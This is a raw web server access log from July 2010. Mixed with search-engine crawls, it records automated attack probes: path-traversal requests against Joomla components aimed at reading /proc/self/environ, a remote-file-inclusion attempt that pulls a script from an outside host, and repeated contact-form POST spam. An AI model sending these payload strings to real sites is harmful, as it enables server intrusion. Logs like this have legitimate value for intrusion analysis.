89.212.6.4 - - [01/Jul/2010:01:20:39 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:20:39 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:20:39 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:20:39 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:20:39 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:20:39 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:20:40 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:20:40 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:20:40 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:20:40 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:20:40 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:20:40 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:20:40 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:20:40 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:21:16 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:21:16 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:21:16 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:21:18 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:21:18 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:21:18 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:21:19 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:21:19 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:21:19 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:21:21 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:21:21 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:21:21 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:21:22 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:21:22 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:21:22 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:21:23 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:21:23 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:21:23 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
109.123.77.100 - - [01/Jul/2010:01:21:54 -0500] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.810"
188.40.37.133 - - [01/Jul/2010:01:21:56 -0500] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.833"
67.195.112.180 - - [01/Jul/2010:01:23:07 -0500] "GET /logs/access_log.1160006400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
188.40.37.133 - - [01/Jul/2010:01:23:16 -0500] "GET /logs/access_log.1276300800//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 378 "-""libwww-perl/5.833"
188.40.37.133 - - [01/Jul/2010:01:23:16 -0500] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.833"
188.40.37.133 - - [01/Jul/2010:01:23:16 -0500] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 356 "-""libwww-perl/5.833"
109.123.77.100 - - [01/Jul/2010:01:23:26 -0500] "GET /logs/access_log.1276300800//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 378 "-""libwww-perl/5.810"
109.123.77.100 - - [01/Jul/2010:01:23:26 -0500] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.810"
109.123.77.100 - - [01/Jul/2010:01:23:26 -0500] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 356 "-""libwww-perl/5.810"
109.123.77.100 - - [01/Jul/2010:01:27:39 -0500] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.810"
188.40.37.133 - - [01/Jul/2010:01:27:43 -0500] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.833"
67.195.112.180 - - [01/Jul/2010:01:28:38 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.200.170.145 - - [01/Jul/2010:01:29:01 -0500] "GET //index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
188.40.37.133 - - [01/Jul/2010:01:30:50 -0500] "GET /logs/access_log.1276300800//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 378 "-""libwww-perl/5.833"
188.40.37.133 - - [01/Jul/2010:01:30:50 -0500] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.833"
188.40.37.133 - - [01/Jul/2010:01:30:50 -0500] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 356 "-""libwww-perl/5.833"
109.123.77.100 - - [01/Jul/2010:01:31:04 -0500] "GET /logs/access_log.1276300800//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 378 "-""libwww-perl/5.810"
109.123.77.100 - - [01/Jul/2010:01:31:04 -0500] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.810"
109.123.77.100 - - [01/Jul/2010:01:31:04 -0500] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 356 "-""libwww-perl/5.810"
188.40.37.133 - - [01/Jul/2010:01:37:50 -0500] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.833"
109.123.77.100 - - [01/Jul/2010:01:38:04 -0500] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.810"
109.123.77.100 - - [01/Jul/2010:01:38:04 -0500] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.810"
207.46.199.183 - - [01/Jul/2010:01:38:18 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
109.123.77.100 - - [01/Jul/2010:01:40:59 -0500] "GET /logs/access_log.1276300800//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 378 "-""libwww-perl/5.810"
109.123.77.100 - - [01/Jul/2010:01:40:59 -0500] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.810"
109.123.77.100 - - [01/Jul/2010:01:40:59 -0500] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 356 "-""libwww-perl/5.810"
109.123.77.100 - - [01/Jul/2010:01:41:01 -0500] "GET /logs/access_log.1276300800//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 378 "-""libwww-perl/5.810"
109.123.77.100 - - [01/Jul/2010:01:41:01 -0500] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.810"
109.123.77.100 - - [01/Jul/2010:01:41:02 -0500] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 356 "-""libwww-perl/5.810"
188.40.37.133 - - [01/Jul/2010:01:41:19 -0500] "GET /logs/access_log.1276300800//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 378 "-""libwww-perl/5.833"
188.40.37.133 - - [01/Jul/2010:01:41:20 -0500] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.833"
188.40.37.133 - - [01/Jul/2010:01:41:20 -0500] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 356 "-""libwww-perl/5.833"
94.101.145.120 - - [01/Jul/2010:01:41:44 -0500] "GET /index.php?option=com_myblogcontroller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
89.212.6.4 - - [01/Jul/2010:01:45:03 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:45:03 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:45:03 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:45:03 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:45:03 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:45:03 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:45:04 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:45:04 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:45:04 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:45:04 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:45:04 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:45:04 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:45:04 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:45:04 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:45:04 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:45:05 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:45:05 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:45:05 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
202.62.103.120 - - [01/Jul/2010:01:47:11 -0500] "GET /?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
93.186.192.124 - - [01/Jul/2010:01:47:40 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
93.186.192.124 - - [01/Jul/2010:01:47:40 -0500] "GET /logs/access_log.1274572800%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
93.186.192.124 - - [01/Jul/2010:01:47:40 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
87.120.210.8 - - [01/Jul/2010:01:52:37 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.812"
66.249.71.185 - - [01/Jul/2010:01:53:02 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.13.140 - - [01/Jul/2010:01:55:46 -0500] "GET /artwork/menorahs.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
93.186.192.124 - - [01/Jul/2010:01:57:37 -0500] "GET /logs/access_log.1274572800//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
94.101.145.120 - - [01/Jul/2010:01:59:43 -0500] "GET /logs/access_log.1274832000/index.php?option=com_myblogcontroller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
94.101.145.120 - - [01/Jul/2010:01:59:49 -0500] "GET /index.php?option=com_myblogcontroller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
94.101.145.120 - - [01/Jul/2010:01:59:51 -0500] "GET /logs/index.php?option=com_myblogcontroller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
216.127.70.140 - - [01/Jul/2010:02:00:18 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
87.120.210.8 - - [01/Jul/2010:02:00:46 -0500] "GET /logs/access_log.1275696000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.812"
87.120.210.8 - - [01/Jul/2010:02:00:46 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.812"
87.120.210.8 - - [01/Jul/2010:02:00:47 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11614 "-""libwww-perl/5.812"
94.101.145.120 - - [01/Jul/2010:02:00:53 -0500] "GET /index.php?option=com_myblogcontroller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
94.101.145.120 - - [01/Jul/2010:02:01:09 -0500] "GET /index.php?option=com_myblogcontroller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
207.46.204.178 - - [01/Jul/2010:02:01:16 -0500] "GET /costume/costume1.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
94.101.145.120 - - [01/Jul/2010:02:02:43 -0500] "GET /index.php?option=com_myblogcontroller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
67.195.112.180 - - [01/Jul/2010:02:04:07 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [01/Jul/2010:02:04:08 -0500] "GET /costume/index1.htm HTTP/1.0" 200 21829 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.127.70.140 - - [01/Jul/2010:02:04:19 -0500] "GET /logs/access_log.1277164800/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
216.127.70.140 - - [01/Jul/2010:02:04:19 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
216.127.70.140 - - [01/Jul/2010:02:04:19 -0500] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
216.127.70.140 - - [01/Jul/2010:02:04:28 -0500] "GET /logs/access_log.1277164800/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
216.127.70.140 - - [01/Jul/2010:02:04:28 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
216.127.70.140 - - [01/Jul/2010:02:04:28 -0500] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
94.101.145.120 - - [01/Jul/2010:02:05:00 -0500] "GET /logs/access_log.1277164800/index.php?option=com_myblogcontroller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
94.101.145.120 - - [01/Jul/2010:02:05:01 -0500] "GET /index.php?option=com_myblogcontroller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
94.101.145.120 - - [01/Jul/2010:02:05:02 -0500] "GET /logs/index.php?option=com_myblogcontroller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
216.127.70.140 - - [01/Jul/2010:02:07:43 -0500] "GET /logs/access_log.1274832000/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
94.101.145.120 - - [01/Jul/2010:02:08:59 -0500] "GET /index.php?option=com_myblogcontroller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
88.61.57.14 - - [01/Jul/2010:02:10:06 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
87.120.210.8 - - [01/Jul/2010:02:12:58 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.812"
89.200.170.145 - - [01/Jul/2010:02:13:17 -0500] "GET /logs/access_log.1276128000//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
89.200.170.145 - - [01/Jul/2010:02:13:17 -0500] "GET //index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
89.200.170.145 - - [01/Jul/2010:02:13:18 -0500] "GET /logs//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
87.250.255.243 - - [01/Jul/2010:02:14:57 -0500] "GET /logs/access_log.1221696000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
87.120.210.8 - - [01/Jul/2010:02:18:52 -0500] "GET /logs/access_log.1275696000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.812"
87.120.210.8 - - [01/Jul/2010:02:18:53 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.812"
87.120.210.8 - - [01/Jul/2010:02:18:53 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11614 "-""libwww-perl/5.812"
89.212.6.4 - - [01/Jul/2010:02:19:22 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:02:19:22 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:02:19:22 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:02:19:22 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:02:19:22 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:02:19:22 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:02:19:23 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:02:19:23 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:02:19:23 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:02:19:23 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:02:19:23 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:02:19:23 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:02:19:23 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:02:19:23 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:02:19:23 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:02:19:24 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:02:19:24 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:02:19:24 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
